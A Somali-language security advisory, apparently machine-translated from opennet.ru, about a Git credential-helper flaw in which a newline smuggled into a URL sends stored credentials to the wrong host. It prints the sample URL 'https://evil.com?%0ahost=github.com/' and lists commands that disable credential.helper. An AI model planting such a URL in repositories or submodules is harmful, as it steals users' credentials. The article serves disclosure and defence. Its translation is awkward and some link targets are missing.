siidaynta saxda ah ee nidaamka xakamaynta isha qaybsan Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 iyo 2.17.4, in kaas oo meesha ka saaray () in maamulaha"", taas oo sababta aqoonsiga in loo diro martida khaldan marka macmiilka git uu galo kaydka isagoo isticmaalaya URL si gaar ah loo qaabeeyey oo ka kooban xarfo khad cusub. Nuglaanta waxaa loo isticmaali karaa in lagu habeeyo aqoonsiga ka yimid martigeliyaha kale si loogu diro server-ka uu gacanta ku hayo qofka weerarka geystay.
Marka la tilmaamayo URL sida "https://evil.com?%0ahost=github.com/", maamulaha aqoonsiga marka lagu xirayo martigeliyaha xumaanta.com wuxuu dhaafi doonaa cabbirada aqoonsiga ee loo cayimay github.com. Dhibaatadu waxay dhacdaa marka la qabanayo hawlgallada sida "git clone", oo ay ku jiraan habaynta URL-yada submodule-ka (tusaale, "git submodule update" waxay si toos ah uga baaraandegi doontaa URL-yada lagu cayimay faylka .gitmodules ee kaydka). Nuglaanta ayaa ah tan ugu khatarta badan xaaladaha uu horumariyuhu xidho kaydka isagoon arkin URL-ka, tusaale ahaan, marka la shaqaynayo qalab-hoosaadyada, ama nidaamyada fuliya ficillada tooska ah, tusaale ahaan, qoraallada dhismaha xidhmada.
Si loo xakameeyo dayacanka noocyada cusub gudbinta xaraf cusub oo qiima kasta oo lagu gudbiyo hab-maamuuska sarrifka aqoonsiga. Qaybinta, waxaad ula socon kartaa sii deynta xirmada cusub ee boggaga , , , , , , .
Si looga hortago dhibaatada Ha isticmaalin aqoonsiga Si aad gabi ahaanba u joojiso maamulaha aqoonsiga.helper, kaas oo sameeya iyo ka soo saarida furaha sirta ah , la ilaaliyo ama fayl leh furaha sirta ah, waxaad isticmaali kartaa amarrada:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru